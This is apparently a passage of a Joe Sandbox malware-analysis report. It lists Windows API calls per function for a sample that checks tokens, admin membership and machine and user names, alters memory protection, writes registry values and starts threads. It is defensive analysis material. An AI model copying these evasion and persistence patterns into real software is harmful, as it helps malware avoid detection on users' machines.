WaitForSingleObject.KERNEL32(000000FF), ref: 004072AF
GetCurrentProcessId.KERNEL32 ref: 004072D7

Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040487E
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404881
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040489A
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040489D
Part of subcall function 0040485C: OpenProcess.KERNEL32(00000400,00000000), ref: 004048D1
Part of subcall function 0040485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00404907
Part of subcall function 0040485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00404921
Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00404942
Part of subcall function 0040485C: GetLastError.KERNEL32 ref: 00404944
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00404958
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040495B
Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00404979
Part of subcall function 0040485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0040499D
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00404A0C
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404A0F
Part of subcall function 0040485C: GetCursor.USER32 ref: 00404A20
Part of subcall function 0040485C: wsprintfW.USER32 ref: 00404A53
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404A6C
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A75
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A7C
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A7F
Part of subcall function 0040485C: CloseHandle.KERNEL32(00000000), ref: 00404A84
Part of subcall function 0040485C: CloseHandle.KERNEL32(?), ref: 00404A8D
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A9E
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404AA3
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404AA6

GetProcessHeap.KERNEL32(00000008,0000000C), ref: 004072E6
HeapAlloc.KERNEL32(00000000), ref: 004072ED
GetCurrentProcessId.KERNEL32 ref: 00407300
CreateThread.KERNEL32(00000000,00000000,Function_00006C88,00000000,00000000,00000000), ref: 00407311
CloseHandle.KERNEL32(00000000), ref: 00407318
CreateThread.KERNEL32(00000000,00000000,Function_000070D8,00000000,00000000,00000000), ref: 00407368
CloseHandle.KERNEL32(00000000), ref: 0040736F

Part of subcall function 0040E0EF: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,001CFDA8), ref: 0040E140
Part of subcall function 0040E0EF: HeapAlloc.KERNEL32(00000000), ref: 0040E143
Part of subcall function 0040E0EF: GetShellWindow.USER32 ref: 0040E155
Part of subcall function 0040E0EF: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 0040E1BD
Part of subcall function 0040E0EF: HeapAlloc.KERNEL32(00000000), ref: 0040E1C0
Part of subcall function 0040E0EF: ReleaseCapture.USER32 ref: 0040E1D4
Part of subcall function 0040E0EF: LoadLibraryA.KERNEL32(?), ref: 0040E1FE
Part of subcall function 0040E0EF: GetProcAddress.KERNEL32(00000000), ref: 0040E205
Part of subcall function 0040E0EF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E219
Part of subcall function 0040E0EF: HeapFree.KERNEL32(00000000), ref: 0040E222
Part of subcall function 0040E0EF: GetProcessHeap.KERNEL32(00000000,?), ref: 0040E227
Part of subcall function 0040E0EF: HeapFree.KERNEL32(00000000), ref: 0040E22A
Part of subcall function 0040E0EF: VirtualAlloc.KERNEL32(00000000,7142424B,00003000,00000004), ref: 0040E261
Part of subcall function 0040E0EF: VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040E2E1

Sleep.KERNEL32(000003E8), ref: 0040739E
Sleep.KERNEL32(0000001E), ref: 004073A2

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040D9F1, Relevance: 16.6, APIs: 11, Instructions: 94

APIs

Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,00000000,001CFDA8,001CFDA8,001CFDA8,001CFDA8,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D991
Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0040D9AB
Part of subcall function 0040D97F: HeapAlloc.KERNEL32(00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9B2
Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,7142434B,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D9CD
Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000000,00000000,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9DA
Part of subcall function 0040D97F: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040D9E1

CreateFileW.KERNEL32(001CFDA8,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040DA1F
GetFileSize.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA2E
GetProcessHeap.KERNEL32(00000008,00000002,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA47
HeapAlloc.KERNEL32(00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA4E
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040DA63
GetLastError.KERNEL32(?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA8B
CloseHandle.KERNEL32(00000000), ref: 0040DA99
GetProcessHeap.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAB0
HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DAB7
GetProcessHeap.KERNEL32(00000000,?,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAC3
HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DACA

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040E897, Relevance: 16.6, APIs: 11, Instructions: 81

APIs

OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0040F1FF), ref: 0040E8A6
GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,?,?,?,0040F1FF), ref: 0040E8C2
GetLastError.KERNEL32(?,0040F1FF), ref: 0040E8D0
GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0040F1FF), ref: 0040E8E1
HeapAlloc.KERNEL32(00000000,?,0040F1FF), ref: 0040E8E8
GetTokenInformation.ADVAPI32(?,00000019,00000000,?,?,?,0040F1FF), ref: 0040E901
GetSidSubAuthorityCount.ADVAPI32(00000000,?,0040F1FF), ref: 0040E90D
GetSidSubAuthority.ADVAPI32(00000000,?,?,0040F1FF), ref: 0040E924
GetProcessHeap.KERNEL32(00000000,00000000,?,0040F1FF), ref: 0040E946
HeapFree.KERNEL32(00000000,?,0040F1FF), ref: 0040E94D
CloseHandle.KERNEL32(?), ref: 0040E957

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004019C7, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102

APIs

Part of subcall function 00404521: GetModuleHandleW.KERNEL32(00000000,7142434B,001CFDA8,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040453A
Part of subcall function 00404521: GetCurrentProcess.KERNEL32(00000008,004019F5,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404546
Part of subcall function 00404521: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040454D
Part of subcall function 00404521: GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 00404570
Part of subcall function 00404521: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404572
Part of subcall function 00404521: GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404587
Part of subcall function 00404521: GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 004045A7
Part of subcall function 00404521: ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 004045B7
Part of subcall function 00404521: GetProcessHeap.KERNEL32(00000008,00000025), ref: 00404601
Part of subcall function 00404521: HeapAlloc.KERNEL32(00000000), ref: 00404608
Part of subcall function 00404521: GetCapture.USER32 ref: 00404617
Part of subcall function 00404521: StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00404647
Part of subcall function 00404521: LocalFree.KERNEL32(76AD46E9), ref: 0040465B
Part of subcall function 00404521: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404664
Part of subcall function 00404521: HeapFree.KERNEL32(00000000), ref: 0040466B
Part of subcall function 00404521: GlobalFree.KERNEL32(00000000), ref: 00404675
Part of subcall function 00404521: CloseHandle.KERNEL32(004019F5), ref: 0040467F

Part of subcall function 0040BE1A: GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0040BE64
Part of subcall function 0040BE1A: HeapAlloc.KERNEL32(00000000), ref: 0040BE6B
Part of subcall function 0040BE1A: GetFocus.USER32 ref: 0040BE7C
Part of subcall function 0040BE1A: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0040BEB5
Part of subcall function 0040BE1A: lstrlenA.KERNEL32(?), ref: 0040BEC9
Part of subcall function 0040BE1A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BEEA
Part of subcall function 0040BE1A: HeapFree.KERNEL32(00000000), ref: 0040BEF1

Sleep.KERNEL32(00002710,76AD46E9,76E6FE8D,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A14
GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A24

Part of subcall function 0040E6ED: GetModuleHandleW.KERNEL32(00000000,7142434B,001CFDA8,?,?,?,?,?,?,?,?,00401A31), ref: 0040E6FD
Part of subcall function 0040E6ED: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040E703
Part of subcall function 0040E6ED: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040E70E
Part of subcall function 0040E6ED: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?,?,?,?,?,?,00401A31), ref: 0040E72D
Part of subcall function 0040E6ED: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x), ref: 0040E736
Part of subcall function 0040E6ED: GetComputerNameW.KERNEL32(00000000,?), ref: 0040E751
Part of subcall function 0040E6ED: GetProcessHeap.KERNEL32(00000008,0000001D,?), ref: 0040E78C
Part of subcall function 0040E6ED: HeapAlloc.KERNEL32(00000000), ref: 0040E78F
Part of subcall function 0040E6ED: GetClipboardOwner.USER32 ref: 0040E79C
Part of subcall function 0040E6ED: lstrcpyW.KERNEL32(00000000), ref: 0040E7CF
Part of subcall function 0040E6ED: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E7DE
Part of subcall function 0040E6ED: HeapFree.KERNEL32(00000000), ref: 0040E7E1
Part of subcall function 0040E6ED: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040E80F
Part of subcall function 0040E6ED: CheckTokenMembership.ADVAPI32(00000000,?,00401A31), ref: 0040E82A
Part of subcall function 0040E6ED: FreeSid.ADVAPI32(?), ref: 0040E836
Part of subcall function 0040E6ED: CreateWellKnownSid.ADVAPI32(00000027,00000000,?,00401A31), ref: 0040E866
Part of subcall function 0040E6ED: CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0040E87C

Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,001CFDA8), ref: 00404237
Part of subcall function 004041E5: HeapAlloc.KERNEL32(00000000), ref: 0040423A
Part of subcall function 004041E5: GetShellWindow.USER32 ref: 00404255
Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 004042AC
Part of subcall function 004041E5: HeapAlloc.KERNEL32(00000000), ref: 004042AF
Part of subcall function 004041E5: GetDoubleClickTime.USER32 ref: 004042CD
Part of subcall function 004041E5: LoadLibraryA.KERNEL32(?), ref: 004042F7
Part of subcall function 004041E5: GetProcAddress.KERNEL32(00000000), ref: 004042FE
Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000008,00000014), ref: 00404376
Part of subcall function 004041E5: HeapAlloc.KERNEL32(00000000), ref: 00404379
Part of subcall function 004041E5: GetDialogBaseUnits.USER32 ref: 00404390
Part of subcall function 004041E5: LoadLibraryA.KERNEL32(?), ref: 004043BA
Part of subcall function 004041E5: GetProcAddress.KERNEL32(00000000), ref: 004043C1
Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00404419
Part of subcall function 004041E5: HeapAlloc.KERNEL32(00000000), ref: 0040441C
Part of subcall function 004041E5: CloseClipboard.USER32 ref: 00404433
Part of subcall function 004041E5: LoadLibraryA.KERNEL32(?), ref: 0040445D
Part of subcall function 004041E5: GetProcAddress.KERNEL32(00000000), ref: 00404464
Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000008,00401A39), ref: 00404487
Part of subcall function 004041E5: HeapAlloc.KERNEL32(00000000), ref: 0040448A
Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000000,00000005), ref: 004044C8
Part of subcall function 004041E5: HeapFree.KERNEL32(00000000), ref: 004044CB
Part of subcall function 004041E5: CloseHandle.KERNEL32(?), ref: 004044D4
Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004044DD
Part of subcall function 004041E5: HeapFree.KERNEL32(00000000), ref: 004044E0
Part of subcall function 004041E5: CloseHandle.KERNEL32(?), ref: 004044EC
Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004044F5
Part of subcall function 004041E5: HeapFree.KERNEL32(00000000), ref: 004044F8
Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404504
Part of subcall function 004041E5: HeapFree.KERNEL32(00000000), ref: 0040450D
Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000000,?), ref: 00404512
Part of subcall function 004041E5: HeapFree.KERNEL32(00000000), ref: 00404515

Part of subcall function 0040BF00: GetProcessHeap.KERNEL32(00000008,00000015,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040BF97
Part of subcall function 0040BF00: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040BF9A
Part of subcall function 0040BF00: GetFocus.USER32 ref: 0040BFAB
Part of subcall function 0040BF00: lstrcatW.KERNEL32(00000000), ref: 0040BFDE
Part of subcall function 0040BF00: GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040C012
Part of subcall function 0040BF00: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040C042
Part of subcall function 0040BF00: HeapFree.KERNEL32(00000000), ref: 0040C045

VirtualProtect.KERNEL32(00412000,00000184,00000040,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A85
VirtualProtect.KERNEL32(00412000,00000184,?,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A9F

Part of subcall function 0040FCD2: GetProcessHeap.KERNEL32(00000008,0000004D,00412000,7142434B,001CFDA8), ref: 0040FD46
Part of subcall function 0040FCD2: HeapAlloc.KERNEL32(00000000), ref: 0040FD49
Part of subcall function 0040FCD2: GetDialogBaseUnits.USER32 ref: 0040FD64
Part of subcall function 0040FCD2: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,000F003F,00000000), ref: 0040FD98
Part of subcall function 0040FCD2: GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0040FDFD
Part of subcall function 0040FCD2: HeapAlloc.KERNEL32(00000000), ref: 0040FE00
Part of subcall function 0040FCD2: CloseClipboard.USER32 ref: 0040FE14
Part of subcall function 0040FCD2: RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,?,00000004), ref: 0040FE47
Part of subcall function 0040FCD2: RegCloseKey.ADVAPI32(00000000), ref: 0040FE50
Part of subcall function 0040FCD2: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FE5F
Part of subcall function 0040FCD2: HeapFree.KERNEL32(00000000), ref: 0040FE62
Part of subcall function 0040FCD2: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FE6E
Part of subcall function 0040FCD2: HeapFree.KERNEL32(00000000), ref: 0040FE71

GlobalAddAtomW.KERNEL32 ref: 00401ABF
AddAtomW.KERNEL32 ref: 00401ACB

Part of subcall function 0040D9F1: CreateFileW.KERNEL32(001CFDA8,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040DA1F
Part of subcall function 0040D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA2E
Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA47
Part of subcall function 0040D9F1: HeapAlloc.KERNEL32(00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA4E
Part of subcall function 0040D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040DA63
Part of subcall function 0040D9F1: GetLastError.KERNEL32(?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA8B
Part of subcall function 0040D9F1: CloseHandle.KERNEL32(00000000), ref: 0040DA99
Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAB0
Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DAB7
Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAC3
Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DACA

Part of subcall function 0040E684: GetModuleHandleA.KERNEL32(?,?), ref: 0040E6BD
Part of subcall function 0040E684: GetProcAddress.KERNEL32(00000000), ref: 0040E6C4

Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000008,00000208,7142434B), ref: 004016C4
Part of subcall function 004016A9: HeapAlloc.KERNEL32(00000000), ref: 004016C7
Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000008,0000009D), ref: 004017AA
Part of subcall function 004016A9: HeapAlloc.KERNEL32(00000000), ref: 004017AD
Part of subcall function 004016A9: GetActiveWindow.USER32 ref: 004017C1
Part of subcall function 004016A9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 004017F0
Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000008,00000039), ref: 00401836
Part of subcall function 004016A9: HeapAlloc.KERNEL32(00000000), ref: 0040183D
Part of subcall function 004016A9: GetCaretBlinkTime.USER32 ref: 00401854
Part of subcall function 004016A9: StrStrIW.SHLWAPI(?,00000000), ref: 0040187E
Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000008,00000051), ref: 004018ED
Part of subcall function 004016A9: HeapAlloc.KERNEL32(00000000), ref: 004018F4
Part of subcall function 004016A9: GetModuleHandleW.KERNEL32(00000000), ref: 0040190A
Part of subcall function 004016A9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00401939
Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401942
Part of subcall function 004016A9: HeapFree.KERNEL32(00000000), ref: 00401949
Part of subcall function 004016A9: StrCatW.SHLWAPI(?), ref: 0040195C
Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0040199E
Part of subcall function 004016A9: HeapFree.KERNEL32(00000000), ref: 004019A1
Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019AA
Part of subcall function 004016A9: HeapFree.KERNEL32(00000000), ref: 004019B3
Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000000,?), ref: 004019B8
Part of subcall function 004016A9: HeapFree.KERNEL32(00000000), ref: 004019BB

GetProcessHeap.KERNEL32(00000000,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401AFB
HeapFree.KERNEL32(00000000), ref: 00401B02

Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040C0CB
Part of subcall function 0040C055: HeapAlloc.KERNEL32(00000000), ref: 0040C0CE
Part of subcall function 0040C055: IsSystemResumeAutomatic.KERNEL32 ref: 0040C0FA
Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040C162
Part of subcall function 0040C055: HeapAlloc.KERNEL32(00000000), ref: 0040C165
Part of subcall function 0040C055: GetClipboardSequenceNumber.USER32 ref: 0040C18A
Part of subcall function 0040C055: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040C1C0
Part of subcall function 0040C055: GetProcAddress.KERNEL32(00000000), ref: 0040C1C7
Part of subcall function 0040C055: GlobalMemoryStatusEx.KERNEL32(?), ref: 0040C1E2
Part of subcall function 0040C055: GetSystemInfo.KERNEL32(?), ref: 0040C1F8
Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000008,000000BD), ref: 0040C30F
Part of subcall function 0040C055: HeapAlloc.KERNEL32(00000000), ref: 0040C312
Part of subcall function 0040C055: GetDesktopWindow.USER32 ref: 0040C32E
Part of subcall function 0040C055: RegOpenKeyW.ADVAPI32(80000002,00000000,?), ref: 0040C365
Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000008,00000051), ref: 0040C3E0
Part of subcall function 0040C055: HeapAlloc.KERNEL32(00000000), ref: 0040C3E7
Part of subcall function 0040C055: GetClipboardViewer.USER32 ref: 0040C403
Part of subcall function 0040C055: RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0040C448
Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040C4A1
Part of subcall function 0040C055: HeapAlloc.KERNEL32(00000000), ref: 0040C4A8
Part of subcall function 0040C055: CountClipboardFormats.USER32 ref: 0040C4C0
Part of subcall function 0040C055: StrStrIW.SHLWAPI(?,00000000), ref: 0040C4F8
Part of subcall function 0040C055: Sleep.KERNEL32(00002710), ref: 0040C505
Part of subcall function 0040C055: StrStrIW.SHLWAPI(?,00000000), ref: 0040C514
Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C51C
Part of subcall function 0040C055: HeapFree.KERNEL32(00000000), ref: 0040C529
Part of subcall function 0040C055: RegCloseKey.ADVAPI32(?), ref: 0040C536
Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C540
Part of subcall function 0040C055: HeapFree.KERNEL32(00000000), ref: 0040C547
Part of subcall function 0040C055: Sleep.KERNEL32(00002710), ref: 0040C56E
Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C59A
Part of subcall function 0040C055: HeapFree.KERNEL32(00000000), ref: 0040C59D
Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000000,?), ref: 0040C5A3
Part of subcall function 0040C055: HeapFree.KERNEL32(00000000), ref: 0040C5A6
Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000000,?), ref: 0040C5B2
Part of subcall function 0040C055: HeapFree.KERNEL32(00000000), ref: 0040C5B5

Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000000D,?,7142434B,001CFDA8), ref: 0040A9CF
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040A9D2
Part of subcall function 0040A98B: GetCapture.USER32 ref: 0040A9F3
Part of subcall function 0040A98B: GetModuleHandleA.KERNEL32(00000000), ref: 0040AA19
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040AA54
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AA57
Part of subcall function 0040A98B: GetOpenClipboardWindow.USER32 ref: 0040AA75
Part of subcall function 0040A98B: GetModuleHandleA.KERNEL32(00000000), ref: 0040AA9B
Part of subcall function 0040A98B: GetUserNameA.ADVAPI32(0041CDF0,?), ref: 0040AAC6
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040AAF9
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AAFC
Part of subcall function 0040A98B: GetClipboardViewer.USER32 ref: 0040AB16
Part of subcall function 0040A98B: lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040AB41
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AB78
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AB7B
Part of subcall function 0040A98B: GetFocus.USER32 ref: 0040AB95
Part of subcall function 0040A98B: lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040ABC1
Part of subcall function 0040A98B: GetComputerNameA.KERNEL32(0041CDF0,00000400), ref: 0040ABE8
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AC16
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AC19
Part of subcall function 0040A98B: GetCursor.USER32 ref: 0040AC30
Part of subcall function 0040A98B: lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040AC5B
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AC8D
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AC90
Part of subcall function 0040A98B: GetMenuCheckMarkDimensions.USER32 ref: 0040ACA7
Part of subcall function 0040A98B: lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040ACD2
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040AD36
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AD39
Part of subcall function 0040A98B: GetMessageExtraInfo.USER32 ref: 0040AD53
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000013), ref: 0040ADB1
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040ADB4
Part of subcall function 0040A98B: GetClipboardOwner.USER32 ref: 0040ADCE
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AE2F
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AE32
Part of subcall function 0040A98B: GetLastError.KERNEL32 ref: 0040AE4F
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000007), ref: 0040AE98
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AE9B
Part of subcall function 0040A98B: CountClipboardFormats.USER32 ref: 0040AEB8
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AEFE
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AF01
Part of subcall function 0040A98B: GetFocus.USER32 ref: 0040AF1E
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AF69
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AF6C
Part of subcall function 0040A98B: GetMessageExtraInfo.USER32 ref: 0040AF89
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AFD4
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AFD7
